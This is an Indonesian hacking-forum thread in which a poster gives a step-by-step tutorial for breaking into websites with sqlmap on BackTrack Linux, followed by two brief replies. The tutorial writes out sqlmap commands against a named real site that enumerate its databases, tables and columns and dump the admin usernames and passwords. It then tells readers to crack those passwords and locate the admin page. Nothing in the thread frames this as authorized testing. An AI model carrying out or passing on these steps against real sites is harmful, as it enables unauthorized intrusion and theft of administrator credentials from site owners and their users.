Tux|Anonymous Developer
Jumlah posting : 18 Cendol : 3 Join date : 08.04.13 Age : 29 Lokasi : unknown
| Subyek: Tutorial SQLMAP for BACKTRACK LINUX Tue Apr 09, 2013 9:07 pm | |
| ASSALAMUALAIKUM WR.WB Halo Ane ingin memberikan ilmu ane kepada ente ente sekalian,,simak tutorial ini, cara tusbol web menggunakan SQLMAP khusus BACKTRACK users Pertama yang harus dipersiapkan adalah : - Langkah-langkah:
- Buka terminal atau dengan menggunakan kombinasi tombol CTRL ALT T lalu ketik
cd /pentest/database/sqlmap
- Spoiler:
- Selanjutnya yaitu menjalankan aplikasi SQL MAP. Ketik
python /pentest/database/sqlmap/sqlmap.py -u #alamat web target yang vulnerability -- dbs (tanpa tanda #) misal nya alamat web nya yaitu http://essgi.in/ithardware.php?id=12 *web ini udah di patch ulang jadi kemungkinan besar sulit untuk ditusbol
- Selanjutnya akan ditampilkan database-database. Setiap web berbeda, jadi pilih yang sesuai.
- Spoiler:
- Selanjutnya yaitu masuk dalam database tersebut dengan mengetikkan
python /pentest/database/sqlmap/sqlmap.py -u http://essgi.in/ithardware.php?id=12 -D #nama database --tables (tanpa tanda #) disini saya memilih database essgi)
- Spoiler:
- Lalu muncul banyak database di sana, kita pilih yang berhubungan dengan user ataupun
admin, ingat setiap web berbeda. Lha di sana ada database yang bernama admin. Selanjutnya yang kita lakukan yaitu mengetikan command berikut python /pentest/database/sqlmap/sqlmap.py -u http://essgi.in/ithardware.php?id=12 -D essgi -T admin --column
- Lalu muncul database yang berisi id, username, dan password dari admin web tersebut.
- Spoiler:
Langkah selanjutnya yaitu dengan menemukan dari username dan password tersebut.Caranya yaitu python /pentest/database/sqlmap/sqlmap.py -u http://essgi.in/ithardware.php?id=12 -D essgi -T admin -C username,password --dump- Muncul konfirmasi yang mengharuskan kita untuk memilih, kita pilih nomor 1, dengan
menekan angka 1 lalu tekan ENTER.
- Spoiler:
Bingo ! ! ! username sama password sudah ditemukan. - Spoiler:
Password kemungkinan besar dapat berupa sandi sandi tertentu yang mengharuskan kita untuk mendecrypt nya terlebih dahulu. Selanjutnya yaitu menemukan halaman admin itu sendiri, kalian bisa mencari halaman admin dengan software tertentu ataupun lewat internet. Sekian tutor dari ane,, entar ane kasih tutor yg laen nya. Jika ada yang ditanyakan silahkan komen.. | |
|
henrian
Jumlah posting : 3 Cendol : 0 Join date : 25.05.13 Age : 41 Lokasi : karaksaan
| Subyek: Re: Tutorial SQLMAP for BACKTRACK LINUX Sun Nov 17, 2013 10:12 am | |
| agak sedikit bingung kang
| |
|
Aurelya666 Family
Jumlah posting : 35 Cendol : 0 Join date : 26.08.15 Age : 44 Lokasi : Yogyakarta
| Subyek: Re: Tutorial SQLMAP for BACKTRACK LINUX Wed Aug 26, 2015 5:24 pm | |
| | |
|
Sponsored content
| Subyek: Re: Tutorial SQLMAP for BACKTRACK LINUX | |
| |
|